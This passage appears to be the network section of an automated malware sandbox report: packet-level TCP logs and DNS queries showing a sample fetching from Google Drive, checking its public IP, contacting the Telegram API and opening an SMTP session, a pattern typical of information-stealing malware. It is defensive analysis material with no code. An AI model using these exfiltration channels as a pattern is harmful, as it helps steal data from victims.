                                                                                          Oct 22, 2024 16:04:18.189558983 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.189598083 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.191308975 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.191394091 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.191400051 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.191435099 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.193331957 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.193382025 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.193388939 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.193424940 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.195111990 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.195168018 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.195174932 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.195209026 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.196928978 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.196983099 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.196991920 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.197022915 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.199018955 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.199093103 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.199116945 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.199162960 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.200634956 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.200700998 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.200725079 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.200778008 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.202397108 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.202464104 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.202478886 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.202527046 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.215329885 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.215476036 CEST44349710142.250.186.65192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.215543985 CEST49710443192.168.2.10142.250.186.65
                                                                                          Oct 22, 2024 16:04:18.460906982 CEST4971180192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:18.466300011 CEST8049711193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.466413975 CEST4971180192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:18.466597080 CEST4971180192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:18.471919060 CEST8049711193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:19.138335943 CEST8049711193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:19.142839909 CEST4971180192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:19.148220062 CEST8049711193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:19.301644087 CEST8049711193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:19.358398914 CEST4971180192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:19.800456047 CEST49712443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:19.800501108 CEST44349712188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:19.800569057 CEST49712443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:19.802503109 CEST49712443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:19.802522898 CEST44349712188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:20.428121090 CEST44349712188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:20.428297997 CEST49712443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:20.431576014 CEST49712443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:20.431587934 CEST44349712188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:20.431973934 CEST44349712188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:20.435756922 CEST49712443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:20.479377031 CEST44349712188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:20.586904049 CEST44349712188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:20.587133884 CEST44349712188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:20.587224960 CEST49712443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:20.592607975 CEST49712443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:20.598944902 CEST4971180192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:20.604583979 CEST8049711193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:20.758388996 CEST8049711193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:20.762573004 CEST49713443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:20.762617111 CEST44349713188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:20.762960911 CEST49713443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:20.762960911 CEST49713443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:20.763005018 CEST44349713188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:20.811575890 CEST4971180192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:21.371479034 CEST44349713188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:21.373570919 CEST49713443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:21.373591900 CEST44349713188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:21.520222902 CEST44349713188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:21.520347118 CEST44349713188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:21.520410061 CEST49713443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:21.521186113 CEST49713443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:21.524225950 CEST4971180192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:21.525346041 CEST4971480192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:21.529947042 CEST8049711193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:21.530145884 CEST4971180192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:21.530708075 CEST8049714193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:21.530924082 CEST4971480192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:21.530924082 CEST4971480192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:21.536267042 CEST8049714193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:22.201797009 CEST8049714193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:22.204072952 CEST49715443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:22.204101086 CEST44349715188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:22.204149961 CEST49715443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:22.204593897 CEST49715443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:22.204612017 CEST44349715188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:22.249021053 CEST4971480192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:22.811554909 CEST44349715188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:22.813014030 CEST49715443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:22.813045979 CEST44349715188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:22.954464912 CEST44349715188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:22.954565048 CEST44349715188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:22.954643011 CEST49715443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:22.955120087 CEST49715443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:22.959446907 CEST4971680192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:22.964894056 CEST8049716193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:22.965044022 CEST4971680192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:22.965133905 CEST4971680192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:22.970586061 CEST8049716193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:23.627620935 CEST8049716193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:23.628845930 CEST49717443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:23.628889084 CEST44349717188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:23.628971100 CEST49717443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:23.629194975 CEST49717443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:23.629205942 CEST44349717188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:23.670921087 CEST4971680192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:24.236854076 CEST44349717188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:24.238507032 CEST49717443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:24.238544941 CEST44349717188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:24.382797003 CEST44349717188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:24.382924080 CEST44349717188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:24.382989883 CEST49717443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:24.383486986 CEST49717443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:24.387118101 CEST4971680192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:24.388328075 CEST4971880192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:24.392925978 CEST8049716193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:24.393023968 CEST4971680192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:24.393682957 CEST8049718193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:24.393773079 CEST4971880192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:24.393897057 CEST4971880192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:24.399233103 CEST8049718193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:25.238945007 CEST8049718193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:25.241086960 CEST49719443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:25.241153002 CEST44349719188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:25.241211891 CEST49719443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:25.241617918 CEST49719443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:25.241631031 CEST44349719188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:25.291538000 CEST4971880192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:25.880044937 CEST44349719188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:25.882128954 CEST49719443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:25.882164001 CEST44349719188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:26.027864933 CEST44349719188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:26.027971983 CEST44349719188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:26.028069973 CEST49719443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:26.028506994 CEST49719443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:26.032098055 CEST4971880192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:26.033636093 CEST4972080192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:26.038079023 CEST8049718193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:26.038181067 CEST4971880192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:26.039117098 CEST8049720193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:26.039199114 CEST4972080192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:26.039328098 CEST4972080192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:26.044672966 CEST8049720193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:26.703584909 CEST8049720193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:26.704999924 CEST49721443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:26.705060959 CEST44349721188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:26.705173969 CEST49721443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:26.705416918 CEST49721443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:26.705426931 CEST44349721188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:26.749053001 CEST4972080192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:27.320470095 CEST44349721188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:27.321974993 CEST49721443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:27.322007895 CEST44349721188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:27.464806080 CEST44349721188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:27.464920044 CEST44349721188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:27.464975119 CEST49721443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:27.465465069 CEST49721443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:27.468904018 CEST4972080192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:27.469589949 CEST4972280192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:27.474997044 CEST8049722193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:27.475188017 CEST8049720193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:27.475234985 CEST4972280192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:27.475265980 CEST4972080192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:27.475423098 CEST4972280192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:27.484105110 CEST8049722193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:28.137046099 CEST8049722193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:28.140610933 CEST49723443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:28.140664101 CEST44349723188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:28.140749931 CEST49723443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:28.146194935 CEST49723443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:28.146209002 CEST44349723188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:28.186511040 CEST4972280192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:28.762384892 CEST44349723188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:28.763837099 CEST49723443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:28.763866901 CEST44349723188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:28.905388117 CEST44349723188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:28.905505896 CEST44349723188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:28.905570030 CEST49723443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:28.906043053 CEST49723443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:28.909512043 CEST4972280192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:28.910737991 CEST4972480192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:28.915617943 CEST8049722193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:28.915720940 CEST4972280192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:28.916182041 CEST8049724193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:28.916289091 CEST4972480192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:28.916474104 CEST4972480192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:28.921853065 CEST8049724193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:29.574677944 CEST8049724193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:29.576064110 CEST49725443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:29.576108932 CEST44349725188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:29.576216936 CEST49725443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:29.576499939 CEST49725443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:29.576510906 CEST44349725188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:29.624943018 CEST4972480192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:30.173655987 CEST44349725188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:30.175339937 CEST49725443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:30.175385952 CEST44349725188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:30.315337896 CEST44349725188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:30.315428972 CEST44349725188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:30.315509081 CEST49725443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:30.315964937 CEST49725443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:30.319032907 CEST4972480192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:30.319777012 CEST4972680192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:30.324909925 CEST8049724193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:30.325028896 CEST4972480192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:30.325551987 CEST8049726193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:30.325628996 CEST4972680192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:30.325721025 CEST4972680192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:30.331250906 CEST8049726193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:30.988492966 CEST8049726193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:31.029916048 CEST49727443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:31.029967070 CEST44349727188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:31.030067921 CEST49727443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:31.030268908 CEST4972680192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:31.030535936 CEST49727443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:31.030546904 CEST44349727188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:31.646409988 CEST44349727188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:31.647941113 CEST49727443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:31.647963047 CEST44349727188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:31.792936087 CEST44349727188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:31.793045998 CEST44349727188.114.97.3192.168.2.10
                                                                                          Oct 22, 2024 16:04:31.793176889 CEST49727443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:31.793632984 CEST49727443192.168.2.10188.114.97.3
                                                                                          Oct 22, 2024 16:04:31.822829962 CEST4972680192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:31.828690052 CEST8049726193.122.130.0192.168.2.10
                                                                                          Oct 22, 2024 16:04:31.828923941 CEST4972680192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:31.830674887 CEST49728443192.168.2.10149.154.167.220
                                                                                          Oct 22, 2024 16:04:31.830712080 CEST44349728149.154.167.220192.168.2.10
                                                                                          Oct 22, 2024 16:04:31.831253052 CEST49728443192.168.2.10149.154.167.220
                                                                                          Oct 22, 2024 16:04:31.831716061 CEST49728443192.168.2.10149.154.167.220
                                                                                          Oct 22, 2024 16:04:31.831727982 CEST44349728149.154.167.220192.168.2.10
                                                                                          Oct 22, 2024 16:04:32.663609028 CEST44349728149.154.167.220192.168.2.10
                                                                                          Oct 22, 2024 16:04:32.663738012 CEST49728443192.168.2.10149.154.167.220
                                                                                          Oct 22, 2024 16:04:32.666831017 CEST49728443192.168.2.10149.154.167.220
                                                                                          Oct 22, 2024 16:04:32.666847944 CEST44349728149.154.167.220192.168.2.10
                                                                                          Oct 22, 2024 16:04:32.667126894 CEST44349728149.154.167.220192.168.2.10
                                                                                          Oct 22, 2024 16:04:32.668617964 CEST49728443192.168.2.10149.154.167.220
                                                                                          Oct 22, 2024 16:04:32.711343050 CEST44349728149.154.167.220192.168.2.10
                                                                                          Oct 22, 2024 16:04:32.902990103 CEST44349728149.154.167.220192.168.2.10
                                                                                          Oct 22, 2024 16:04:32.903064966 CEST44349728149.154.167.220192.168.2.10
                                                                                          Oct 22, 2024 16:04:32.903153896 CEST49728443192.168.2.10149.154.167.220
                                                                                          Oct 22, 2024 16:04:32.905893087 CEST49728443192.168.2.10149.154.167.220
                                                                                          Oct 22, 2024 16:04:38.817065954 CEST4971480192.168.2.10193.122.130.0
                                                                                          Oct 22, 2024 16:04:39.038866043 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:39.044279099 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:39.044500113 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:39.782625914 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:39.787214994 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:39.792679071 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:40.036479950 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:40.036618948 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:40.041965961 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:40.291269064 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:40.291817904 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:40.298890114 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:40.548450947 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:40.548522949 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:40.548558950 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:40.548585892 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:40.551434994 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:40.558651924 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:40.801074982 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:40.803610086 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:40.809405088 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:41.055737019 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:41.056462049 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:41.062128067 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:41.373395920 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:41.374100924 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:41.379498005 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:41.689507008 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:41.689893961 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:41.695252895 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:41.939440966 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:41.940094948 CEST49729587192.168.2.10213.165.67.118
                                                                                          Oct 22, 2024 16:04:41.946177006 CEST58749729213.165.67.118192.168.2.10
                                                                                          Oct 22, 2024 16:04:41.946259022 CEST49729587192.168.2.10213.165.67.118
                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Oct 22, 2024 16:04:12.889697075 CEST5712053192.168.2.101.1.1.1
                                                                                          Oct 22, 2024 16:04:12.898243904 CEST53571201.1.1.1192.168.2.10
                                                                                          Oct 22, 2024 16:04:14.224435091 CEST5491253192.168.2.101.1.1.1
                                                                                          Oct 22, 2024 16:04:14.232245922 CEST53549121.1.1.1192.168.2.10
                                                                                          Oct 22, 2024 16:04:18.449758053 CEST6213053192.168.2.101.1.1.1
                                                                                          Oct 22, 2024 16:04:18.457161903 CEST53621301.1.1.1192.168.2.10
                                                                                          Oct 22, 2024 16:04:19.574568987 CEST5911253192.168.2.101.1.1.1
                                                                                          Oct 22, 2024 16:04:19.799618959 CEST53591121.1.1.1192.168.2.10
                                                                                          Oct 22, 2024 16:04:31.822679996 CEST6361253192.168.2.101.1.1.1
                                                                                          Oct 22, 2024 16:04:31.829875946 CEST53636121.1.1.1192.168.2.10
                                                                                          Oct 22, 2024 16:04:39.026559114 CEST5667853192.168.2.101.1.1.1
                                                                                          Oct 22, 2024 16:04:39.036209106 CEST53566781.1.1.1192.168.2.10
                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                          Oct 22, 2024 16:04:12.889697075 CEST192.168.2.101.1.1.10x5342Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                          Oct 22, 2024 16:04:14.224435091 CEST192.168.2.101.1.1.10xf1a3Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                          Oct 22, 2024 16:04:18.449758053 CEST192.168.2.101.1.1.10xdf59Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                          Oct 22, 2024 16:04:19.574568987 CEST192.168.2.101.1.1.10xe66dStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                          Oct 22, 2024 16:04:31.822679996 CEST192.168.2.101.1.1.10x5711Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                          Oct 22, 2024 16:04:39.026559114 CEST192.168.2.101.1.1.10xb038Standard query (0)smtp.ionos.esA (IP address)IN (0x0001)false
                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                          Oct 22, 2024 16:04:12.898243904 CEST1.1.1.1192.168.2.100x5342No error (0)drive.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                                          Oct 22, 2024 16:04:14.232245922 CEST1.1.1.1192.168.2.100xf1a3No error (0)drive.usercontent.google.com142.250.186.65A (IP address)IN (0x0001)false
                                                                                          Oct 22, 2024 16:04:18.457161903 CEST1.1.1.1192.168.2.100xdf59No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                          Oct 22, 2024 16:04:18.457161903 CEST1.1.1.1192.168.2.100xdf59No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                          Oct 22, 2024 16:04:18.457161903 CEST1.1.1.1192.168.2.100xdf59No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                          Oct 22, 2024 16:04:18.457161903 CEST1.1.1.1192.168.2.100xdf59No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                          Oct 22, 2024 16:04:18.457161903 CEST1.1.1.1192.168.2.100xdf59No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                          Oct 22, 2024 16:04:18.457161903 CEST1.1.1.1192.168.2.100xdf59No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
